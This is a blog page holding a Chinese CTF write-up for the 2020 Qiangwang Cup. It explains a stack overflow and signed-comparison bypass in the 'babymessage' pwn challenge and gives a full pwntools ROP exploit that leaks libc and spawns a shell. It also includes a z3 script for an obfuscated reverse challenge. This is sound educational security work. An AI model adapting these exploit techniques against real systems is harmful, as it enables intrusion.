<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="Some pieces of beef, and some vegetables too.">
    <meta name="keyword"  content="undefined">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
          2020 第四届强网杯解题报告（writeup） - Goulash
        
    </title>

    <link rel="canonical" href="https://hx1997.github.io/2020/08/24/2020-qwb-writeup/">

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.2/dist/css/bootstrap.min.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/hux-blog.min.css">

    <!-- Pygments Highlight CSS -->
    <link rel="stylesheet" href="/css/highlight.css">

    <!-- Custom Fonts -->
    <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
    <!-- Hux change font-awesome CDN to qiniu -->
    <link href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">


    <!-- Hux Delete, sad but pending in China
    <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/
    css'>
    -->


    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- ga & ba script hoook -->
    
<!-- Google Analytics -->
<script>
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-59747917-2', 'auto');
	ga('send', 'pageview');
</script>
<!-- End Google Analytics --><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</head>


<!-- hack iOS CSS :active style -->
<body ontouchstart="">

    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Goulash</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>

                    

                        
                    

                        
                        <li>
                            <a href="/about/">ABOUT</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/tags/">TAGS</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/animal-farm/">Animal Farm</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/links/">Links</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/archive/">ARCHIVES</a>
                        </li>
                        
                    
                    
                </ul>
            </div>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>


    <!-- Main Content -->
    
<!-- Image to hack wechat -->
<!-- <img src="https://hx1997.github.io/img/icon_wechat.png" width="0" height="0"> -->
<!-- <img src="{{ site.baseurl }}/{% if page.header-img %}{{ page.header-img }}{% else %}{{ site.header-img }}{% endif %}" width="0" height="0"> -->

<!-- Post Header -->
<style type="text/css">
    header.intro-header{
        background-image: url('///s3.bmp.ovh/imgs/2021/12/786122cd6225bd96.jpg')
    }
</style>
<header class="intro-header" >
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <div class="tags">
                        
                          <a class="tag" href="/tags/#信息安全" title="信息安全">信息安全</a>
                        
                          <a class="tag" href="/tags/#CTF" title="CTF">CTF</a>
                        
                          <a class="tag" href="/tags/#Writeups" title="Writeups">Writeups</a>
                        
                    </div>
                    <h1>2020 第四届强网杯解题报告（writeup）</h1>
                    <h2 class="subheading"></h2>
                    <span class="meta">
                        Posted by HX on
                        2020-08-24 | 
                        <span id="/2020/08/24/2020-qwb-writeup/" class="leancloud-visitors" data-flag-title="文章阅读量统计">
                            <span class="pre-meta-item-text">👓 </span>
                            <span class="leancloud-visitors-count"></span>
                            <span class="post-meta-item-text"> views</span>
                        </span>
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

    <!-- Post Container -->
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                post-container">

                <h3 id="x0.-前言">0x0. 前言</h3>
<p>只做出两道水题，还是记录一下吧。</p>
<h3 id="x1.-强网先锋pwn---babymessage---52pt">0x1. 强网先锋（Pwn） - babymessage - 52pt</h3>
<p>菜单选 1 输入 name，选 2 输入 message。message 的长度由栈上变量 <code>v1</code> 决定，与 256 做有符号比较，大于的话长度设为 256，然后用此长度调用 <code>leave_message</code>。</p>
<div class="figure">
<img src="https://s1.ax1x.com/2020/08/25/dyoxds.png">

</div>
<div class="figure">
<img src="https://s1.ax1x.com/2020/08/25/dyozon.png">

</div>
<p>第一次循环，<code>v1</code>（不是 <code>leave_message</code> 那个）一开始是 16，但 <code>leave_message</code> 中 <code>v3</code> 的长度是 8，造成栈溢出，可以覆盖旧的 rbp，从而在函数返回时伪造 rbp 为任意值。</p>
<div class="figure">
<img src="https://s1.ax1x.com/2020/08/25/dyoXLQ.png">

</div>
<p>返回后进入第二次循环，因为在 <code>v1</code> 和 256 比较大小时以 rbp 为基准寻址，加上有符号比较存在整数溢出漏洞，所以可以伪造 rbp 使得 rbp-4 处的值是一个负数，从而绕过大小检查，在 <code>leave_message</code> 中 <code>read</code> 时读入超长字符串，控制返回地址。</p>
<p>先泄露 <code>puts</code> 的地址，用 <code>__libc_csu_init</code> 中的 <code>pop rdi; ret</code> 做 ROP，传递 <code>puts@got</code> 给 <code>puts@plt</code>，以打印出 <code>puts</code> 地址，根据偏移计算出 one_gadget 地址。</p>
<p>最后返回到 <code>leave_message</code> 函数再触发一次栈溢出，把返回地址改到 one_gadget 就搞定了。</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line"></div><div class="line">context.log_level = <span class="string">'debug'</span></div><div class="line"><span class="comment">#p = process('./babymessage')</span></div><div class="line">p = remote(<span class="string">'123.56.170.202'</span>,<span class="string">'21342'</span>)</div><div class="line">e = ELF(<span class="string">'./babymessage'</span>)</div><div class="line"></div><div class="line">puts_plt = e.plt[<span class="string">'puts'</span>]</div><div class="line">puts_got = e.got[<span class="string">'puts'</span>]</div><div class="line">poprdi = <span class="number">0x400ac3</span></div><div class="line"><span class="comment">#gdb.attach(p)</span></div><div class="line"></div><div class="line">p.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'1'</span>)</div><div class="line">p.sendlineafter(<span class="string">'name: '</span>, <span class="string">'\xff'</span>*<span class="number">4</span>)</div><div class="line">p.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'2'</span>)</div><div class="line">p.sendlineafter(<span class="string">'message: '</span>, <span class="string">'\xff'</span>*<span class="number">8</span>+p64(<span class="number">0x6010d4</span>))</div><div class="line">p.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'2'</span>)</div><div class="line">payload = <span class="string">'deadbeefdeadbeef'</span></div><div class="line">payload += p64(poprdi) + p64(puts_got) + p64(puts_plt)</div><div class="line">payload += p64(poprdi) + p64(<span class="number">41</span>)</div><div class="line">payload += p64(<span class="number">0x40080a</span>) + <span class="string">'\x00'</span></div><div class="line">p.sendlineafter(<span class="string">'message: '</span>, payload)</div><div class="line">p.recvuntil(<span class="string">'done!\n'</span>)</div><div class="line">p.recv(<span class="number">1</span>)</div><div class="line"></div><div class="line">puts_addr = p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)</div><div class="line">puts_addr = u64(puts_addr)</div><div class="line">print(<span class="string">'puts:'</span>+hex(puts_addr))</div><div class="line"></div><div class="line"><span class="comment">#one_shot = puts_addr - 0x3166e</span></div><div class="line">one_shot = puts_addr + <span class="number">0x89a2c</span></div><div class="line"></div><div class="line">print(<span class="string">'one_shot:'</span>+hex(one_shot))</div><div class="line">p.sendlineafter(<span class="string">'message: '</span>, <span class="string">'deadbeefdeadbeef'</span>+p64(one_shot)+<span class="string">'\x00'</span>)</div><div class="line">p.recvuntil(<span class="string">'done!\n'</span>)</div><div class="line">p.interactive()</div></pre></td></tr></table></figure>
<h3 id="x2.-reverse---xx_warmup_obf---103pt">0x2. Reverse - xx_warmup_obf - 103pt</h3>
<p>控制流平坦化，没有什么好说的，就是跑起来硬跟。</p>
<p>注册了一个 signal handler，程序中间会通过 <code>int 3</code> 中断进入 handler 里，改变决定着控制流的状态变量中存储的常数。</p>
<p>一直跟下去，到输入完 flag 后面，这里检验 flag 长度为 1Ch（28）：</p>
<div class="figure">
<img src="https://s1.ax1x.com/2020/08/25/dyovZj.png">

</div>
<p>接着往下跟，这里取输入的 flag 第一个字符的 ASCII 码，乘以 <code>0x5d75</code>，看是否等于 <code>0x253c9e</code>。</p>
<div class="figure">
<img src="https://s1.ax1x.com/2020/08/25/dyTpiq.png">

</div>
<p>所以第一个字符就是 <code>0x253c9e</code> 除以 <code>0x5d75</code> 等于 <code>0x66</code>，即 f，可以猜测前面几个字符是 flag{。</p>
<p>后面的计算也和这里类似，用输入的 flag 里某几位字符乘以一个数，得数全部加起来再判断是否等于某个常数，每次计算可以确定出 flag 里的一个字符，全部 28 个字符算出来就是 flag。</p>
<p>解方程用 z3，不过因为每次乘以的数都不同，也不知道有什么好办法自动解每一个字符（看了别的师傅的 writeup，可以写 IDAPython 脚本，需要学习一个），所以只能用笨办法每个字符重新写 z3 脚本算…… 以下是算中间某个字符的脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> sys</div><div class="line">sys.path.append(<span class="string">'z3/build/'</span>)</div><div class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</div><div class="line"></div><div class="line">s = Solver()</div><div class="line"></div><div class="line">a = BitVec(<span class="string">'a'</span>, <span class="number">32</span>)</div><div class="line"></div><div class="line">flag = <span class="string">'flag&#123;g0_Fuck_xx_5e'</span></div><div class="line">s.add(a*<span class="number">0xFFFC5AF3</span></div><div class="line">	+ord(flag[<span class="number">0</span>])*<span class="number">0x20d94</span></div><div class="line">	+ord(flag[<span class="number">1</span>])*<span class="number">0x2fb77</span></div><div class="line">	+ord(flag[<span class="number">2</span>])*<span class="number">0xFFFD2918</span></div><div class="line">	+ord(flag[<span class="number">3</span>])*<span class="number">0x1882d</span></div><div class="line">	+ord(flag[<span class="number">4</span>])*<span class="number">0xFFFEDE1F</span></div><div class="line">	+ord(flag[<span class="number">5</span>])*<span class="number">0xFFFF0015</span></div><div class="line">	+ord(flag[<span class="number">6</span>])*<span class="number">0xFFFBB7A0</span></div><div class="line">	+ord(flag[<span class="number">7</span>])*<span class="number">0x14a94</span></div><div class="line">	+ord(flag[<span class="number">8</span>])*<span class="number">0xFFFDA0CD</span></div><div class="line">	+ord(flag[<span class="number">9</span>])*<span class="number">0xde69</span></div><div class="line">	+ord(flag[<span class="number">0xa</span>])*<span class="number">0x2FE8</span></div><div class="line">	+ord(flag[<span class="number">0xb</span>])*<span class="number">0x2abe5</span></div><div class="line">	+ord(flag[<span class="number">0xc</span>])*<span class="number">0x26530</span></div><div class="line">	+ord(flag[<span class="number">0xd</span>])*<span class="number">0x4c3d</span></div><div class="line">	+ord(flag[<span class="number">0xe</span>])*<span class="number">0x2383e</span></div><div class="line">	+ord(flag[<span class="number">0xf</span>])*<span class="number">0x42763</span></div><div class="line">	+ord(flag[<span class="number">0x10</span>])*<span class="number">0xe5c9</span></div><div class="line">	+ord(flag[<span class="number">0x11</span>])*<span class="number">0x539</span></div><div class="line">	==<span class="number">0x39F3331</span>)</div><div class="line">s.add(a&gt;<span class="number">0</span>)</div><div class="line">s.add(a&lt;<span class="number">0x100</span>)</div><div class="line"></div><div class="line">print(s.check())</div><div class="line">mod = s.model()</div><div class="line"></div><div class="line">chars = [</div><div class="line">          mod[a],</div><div class="line">        ]</div><div class="line"></div><div class="line">print(chars)</div></pre></td></tr></table></figure>


                <hr>

                

                <ul class="pager">
                    
                        <li class="previous">
                            <a href="/2021/05/16/ciscn-2021-writeup/" data-toggle="tooltip" data-placement="top" title="2021 第十四届全国大学生信息安全竞赛初赛两道逆向解题报告（writeup）">&larr; Previous Post</a>
                        </li>
                    
                    
                        <li class="next">
                            <a href="/2020/08/17/linear-algebra-done-right-ch3-problem-solutions/" data-toggle="tooltip" data-placement="top" title="《线性代数应该这样学》第 3 章习题选做（草稿）">Next Post &rarr;</a>
                        </li>
                    
                </ul>

                

                

                
                <!-- Valine 评论框 start -->
                <div class="comment" id="comment"></div>
                <!-- Valine 评论框 end -->
                

            </div>
    <!-- Side Catalog Container -->
        

    <!-- Sidebar Container -->

            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                

                <!-- Friends Blog -->
                
            </div>

        </div>
    </div>
</article>






<!-- Valine 公共JS代码 start (一个网页只需插入一次) -->
<!--Leancloud 操作库:-->
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<!--Valine 的核心代码库-->
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    var valine_id = 'SxcVY94eFyRKqKoNsjvUdVru-gzGzoHsz';
    var valine_key =  'gtaegP4TT3CzPJH7bwy54kkV';
    new Valine({
        el: '#comment',
        appId: valine_id,
        appKey: valine_key,
        notify: true,
        visitor: true,
        placeholder: '留下邮箱才能收到评论回复通知嗷', // 留言框占位提示文字
    });
</script>
<!-- Valine 公共JS代码 end -->






    <!-- Footer -->
    <!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                
                
                
                    <li>
                        <a target="_blank" href="https://www.zhihu.com/people/zack-48">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa  fa-stack-1x fa-inverse">知</i>
                            </span>
                        </a>
                    </li>
                

                

                

                
                    <li>
                        <a target="_blank"  href="https://github.com/hx1997">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; Goulash 2023 
                    <br>
                    Theme by <a href="http://huangxuan.me">Hux</a> 
                    <span style="display: inline-block; margin: 0 5px;">
                        <i class="fa fa-heart"></i>
                    </span> 
                    Ported by <a href="https://github.com/Kaijun">Kaijun</a>
                </p>
            </div>
        </div>
    </div>
</footer>

<!-- jQuery -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js"></script>

<!-- Bootstrap Core JavaScript -->
<script src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.2/dist/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script src="/js/hux-blog.min.js"></script>


<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>

<!-- 
     Because of the native support for backtick-style fenced code blocks 
     right within the Markdown is landed in Github Pages, 
     From V1.6, There is no need for Highlight.js, 
     so Huxblog drops it officially.

     - https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0  
     - https://help.github.com/articles/creating-and-highlighting-code-blocks/    
-->
<!--
    <script>
        async("http://cdn.jsdelivr.net/highlight.js/8.6/highlight.min.js", function(){
            hljs.initHighlightingOnLoad();
        })
    </script>
    <link href="http://cdn.jsdelivr.net/highlight.js/8.6/styles/github.min.css" rel="stylesheet">
-->


<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("https://hx1997.github.io/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("https://cdn.jsdelivr.net/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>


<!-- Google Analytics -->




<!-- Baidu Tongji -->


<!-- Side Catalog -->





<!-- Image to hack wechat -->
<img src="https://hx1997.github.io/img/icon_wechat.png" width="0" height="0" />
<!-- Migrate from head to bottom, no longer block render and still work --><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config("");
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="//cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->

</body>

</html>
